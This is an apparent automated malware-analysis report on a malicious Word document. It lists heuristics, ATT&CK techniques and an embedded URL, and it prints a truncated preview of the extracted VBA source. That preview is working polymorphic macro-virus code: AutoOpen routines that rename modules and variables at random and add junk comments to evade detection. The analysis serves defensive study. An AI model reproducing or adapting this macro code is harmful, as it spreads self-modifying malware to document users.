MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic auto-execution markers and VBA macros, indicating an attempt to run malicious code upon opening. The AutoOpen macro is present and appears to be obfuscated, likely to download and execute a second-stage payload. The embedded URL, while marked as benign, is included as a potential indicator.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.virii.s5.com/ In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25664 bytes |
SHA-256: 3d87c3979ce3097d39f94b9411f565c95800ef85d4349e982746b0dd8c9e9938 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KGB" Sub AutoOpen2() 'KGB ';`,! On Error Resume Next 'tyH! If ThisDocument.Name <> NormalTemplate.Name Then '„7X! TRTM1 = 12 '�x ! ReDim LUWM1(1 To TRTM1) As String ''*’! LUWM1(1) = "TRTM1": LUWM1(2) = "KSIM1": LUWM1(3) = "AUUM1" '>e+! LUWM1(4) = "LUWM1": LUWM1(5) = "MWCM1": LUWM1(6) = "YNCM1": LUWM1(7) = "GSYM1" '^)„! LUWM1(8) = "PUDM1": LUWM1(9) = "DYRM1": LUWM1(10) = "OUPM1": LUWM1(11) = "GRDM1" LUWM1(12) = "PDBM1" 'UM’! KSIM1 = ActiveDocument.Content '%`8! For GSYM1 = 1 To ActiveDocument.VBProject.VBComponents.Count 'I-‹! OUPM1 = ActiveDocument.VBProject.VBComponents(GSYM1).CodeModule.Lines(2, 1) ']5H! PUDM1 = Mid(OUPM1, 1, 1) 'E8`! DYRM1 = Len(OUPM1) '6?2! If DYRM1 >= 4 Then GRDM1 = Mid(OUPM1, 2, 3) '\e}! If (PUDM1 = "'") And (GRDM1 = ActiveDocument.VBProject.VBComponents(GSYM1).Name) Then '`ˆN! Randomize '„ˆf! GRDM1 = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) ActiveDocument.VBProject.VBComponents(GSYM1).CodeModule.ReplaceLine 2, "'" + GRDM1 ActiveDocument.VBProject.VBComponents(GSYM1).Name = GRDM1 'pm7! PDBM1 = GSYM1 'b/O! End If '‚E>! Next GSYM1 '+}^! ActiveDocument.Windows(1).WindowState = wdWindowStateMinimize '0A�! ActiveDocument.Content = "" '—ŽI! AUUM1 = ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.CountOfLines '6:l! For GSYM1 = 1 To AUUM1 'wo[! ActiveDocument.Content = ActiveDocument.Content + ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.Lines(GSYM1, 1) Next GSYM1 '$VW! For GSYM1 = 1 To TRTM1 'K„+! Randomize 'sXJ! YNCM1 = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "M1" Set MWCM1 = ActiveDocument.Content '@D`! MWCM1.Find.Execute FindText:=LUWM1(GSYM1), ReplaceWith:=YNCM1, Replace:=wdReplaceAll Next GSYM1 'z]W! AUUM1 = ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.CountOfLines '>q3! ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines 1, AUUM1 'I02! YNCM1 = ActiveDocument.Content 'f~‚! ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.AddFromString YNCM1 'A� ! ActiveDocument.Content = "" '‰0b! ActiveDocument.Content = KSIM1 'm^ˆ! mm: 'ˆRz! If ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.Lines(1, 1) <> "Sub AutoOpen()" Then ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines 1, 1 'w|\! GoTo mm 'kmd! End If 'F: ! TRTM1 = ActiveDocument.VBProject.VBComponents.Item(PDBM1).CodeModule.CountOfLines For GSYM1 = 2 To TRTM1 '*6`! OUPM1 = ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.Lines(GSYM1, 1) 'q3s! GRDM1 = Mid(OUPM1, Len(OUPM1)) '&E“! If (GRDM1 <> "!") And (Len(OUPM1) < 80) Then 'hi+! PUDM1 = Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) YNCM1 = OUPM1 + " '" + PUDM1 + "!" '?MŠ! ActiveDocument.VBProject.VBComponents.Item(PDBM1).CodeModule.ReplaceLine GSYM1, YNCM1 End If 'r\„! Next GSYM1 ':†}! ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines TRTM1, 1 '”2B! ActiveDocument.Windows(1).WindowState = wdWindowStateMaximize 'B�‚! End If '# :! End Sub 'r?)! Attribute VB_Name = "Gen0" Sub PolyNgine() 'Gen0 'MI_pirat's PolyMorphing Ngine On Error Resume Next If ThisDocument.Name <> NormalTemplate.Name Then nr = 12 ReDim suk(1 To nr) As String suk(1) = "nr": suk(2) = "bkup": suk(3) = "nuk" suk(4) = "suk": suk(5) = "myRange": suk(6) = "strip": suk(7) = "ik" suk(8) = "char1": suk(9) = "nur": suk(10) = "nam1": suk(11) = "nam2" suk(12) = "kewl" bkup = ActiveDocument.Content 'find and change the module name (100% poly) For ik = 1 To ActiveDocument.VBProject.VBComponents.Count nam1 = ActiveDocument.VBProject.VBComponents(ik).CodeModule.Lines(2, 1) char1 = Mid(nam1, 1, 1) nur = Len(nam1) If nur >= 4 Then nam2 = Mid(nam1, 2, 3) If (char1 = "'") And (nam2 = ActiveDoc ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.